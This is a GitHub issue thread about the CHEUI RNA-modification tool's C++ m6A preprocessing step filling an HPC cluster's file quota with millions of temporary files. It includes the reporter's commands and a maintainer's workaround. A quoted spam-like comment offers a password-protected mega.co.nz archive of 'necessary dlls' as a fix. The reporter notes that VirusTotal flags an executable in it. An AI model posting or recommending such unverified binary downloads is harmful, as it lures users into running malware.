-
Notifications
You must be signed in to change notification settings - Fork 2
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
C++ preprocess (m6A) creates a large number of temporary files #43
Comments
Sorry, I'm confused by this comment. I'm not sure how this is applicable, and I also don't want to run precompiled code with no source, especially on a shared HPC cluster. I'm also using RHEL v9.4 on the cluster, not Windows. Furthermore, VirusTotal flags |
Thanks Ollie for the email
I cc Akanksha and Stefan from the lab who might be able to know how to
circumvent this
E.
…On Sun, 29 Sept 2024 at 13:05, Oliver Cheng ***@***.***> wrote:
Hi all,
Not sure if this is a duplicate of #38
<#38>.
I've been trying to get CHEUI up and running but have been running into an
issue with the preprocessing. Using the C++ preprocessing script (compiled
on GCC v11.3, RHEL 9.4, commit 7b422f7),
I have been running it on a 858GB nanopolish eventalign file, generated
from a ~2GB .fastq of reads.
In this instance, I noticed that the preprocessing script was producing an
absurd amount of temporary files - over 7 million, before the HPC file
quota ran out and the script was killed. (This was much to the chagrin of
my university's HPC admin, and I promptly received a very strongly worded
email advising me not to generate so many temporary files! 😅)
I've attached a small selection of ~1000 of these temporary files for
debugging purposes, if it interests you. Each file seems to be very small -
a few lines max, based off of my n = 10 sample size.
The aligned events file was called using:
nanopolish eventalign -t {threads} \
--reads {input.reads} \
--bam {input.bam} \
--genome {REF} \
--scale-events --signal-index --samples --print-read-names > {output}
and I was calling preprocess using:
# must first be in this path, or else the program crashescd $PATH_TO_CHEUI_PREPROCESS_DIR
./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT
See the attached sample of temporary files below: out_A_signals+IDs.zip
<https://github.com/user-attachments/files/17177384/out_A_signals%2BIDs.zip>
Let me know if there's anything else that you need.
Ollie
—
Reply to this email directly, view it on GitHub
<#43>, or unsubscribe
<https://github.com/notifications/unsubscribe-auth/ADCZKB2NXXLA3QVRF36ASMLZY5U7PAVCNFSM6AAAAABPBFXWZWVHI2DSMVQWIX3LMV43ASLTON2WKOZSGU2TINRXGU4TMNI>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
Sorry, I don't know where that comment was from.
Please disregard that message
E.
…On Sun, 29 Sept 2024 at 13:11, Oliver Cheng ***@***.***> wrote:
maybe this will help
https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Password: changeme I put the necessary dlls in the archive
Sorry, I'm confused by this comment. I'm not sure how this is applicable,
and I also don't want to run precompiled code with no source, especially on
a shared HPC cluster. I also run RHEL v9, not Windows. VirusTotal also
flags x86_64-w64-ranlib.exe as malware. Are you affiliated with the Eyras
computational RNA biology group?
—
Reply to this email directly, view it on GitHub
<#43 (comment)>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/ADCZKB2NK6I7ZWSPFXGH7UDZY5VV5AVCNFSM6AAAAABPBFXWZWVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGOBRGA4DMMZZHA>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
Did you check the possible solution given by @pre-mRNA?: _We apologise for the issue. CHEUI currently generates a large amount of intermediate files. You can process POD5 files sequentially to predict model 1, e.g.: POD5 1 -> eventalign -> preprocess_m6a -> CHEUI model 1 Before predicting model 2, you will need to merge and sort all the model 1 files. Hope this helps._ |
Hi, Thanks for your reply. I have not tried it yet, as I am unsure about the quantity of intermediate files generated. I noticed that the solution above is for the Python preprocess script, while I am using the C++ script. I just wanted to first confirm that the small size of each temporary file (a few lines in size) is expected behaviour? |
Hi all,
Not sure if this is a duplicate of #38.
I've been trying to get CHEUI up and running but have been running into an issue with the preprocessing. Using the C++ preprocessing script (compiled on GCC v11.3, RHEL 9.4, commit
7b422f7808a3c2ffff56a9ead33a199824753b4e
), I have been running it on a 858GBnanopolish eventalign
file, generated from a ~2GB .fastq of reads.In this instance, I noticed that the preprocessing script was producing an absurd amount of temporary files - over 7 million, before the HPC file quota ran out and the script was killed. (This was much to the chagrin of my university's HPC admin, and I promptly received a very strongly worded email advising me not to generate so many temporary files! 😅)
I've attached a small selection of ~1000 of these temporary files for debugging purposes, if it interests you. Each file seems to be very small - a few lines max, based off of my n = 10 sample size.
The aligned events file was called using:
nanopolish eventalign -t {threads} \ --reads {input.reads} \ --bam {input.bam} \ --genome {REF} \ --scale-events --signal-index --samples --print-read-names > {output}
and I was calling preprocess using:
See the attached sample of temporary files below: out_A_signals+IDs.zip
Let me know if there's anything else that you need.
Ollie
The text was updated successfully, but these errors were encountered: